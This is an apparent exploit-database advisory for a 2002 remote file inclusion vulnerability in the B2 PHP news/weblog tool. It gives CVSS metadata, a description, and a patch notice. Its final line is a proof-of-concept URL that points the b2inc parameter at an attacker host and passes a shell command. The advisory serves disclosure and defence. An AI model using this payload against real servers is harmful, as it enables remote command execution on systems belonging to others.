B2 News/Weblog Tool Variable Reference Vulnerability

vendor:

by:

SecurityFocus

7.5

CVSS

HIGH

Variable Reference Vulnerability

CWE

Product Name: B2

Affected Version From: 2000.6.1

Affected Version To: 2000.6.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:b2:b2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix and Linux

2002

B2 News/Weblog Tool Variable Reference Vulnerability

B2 is a news/weblog tool written in php. A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of B2.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls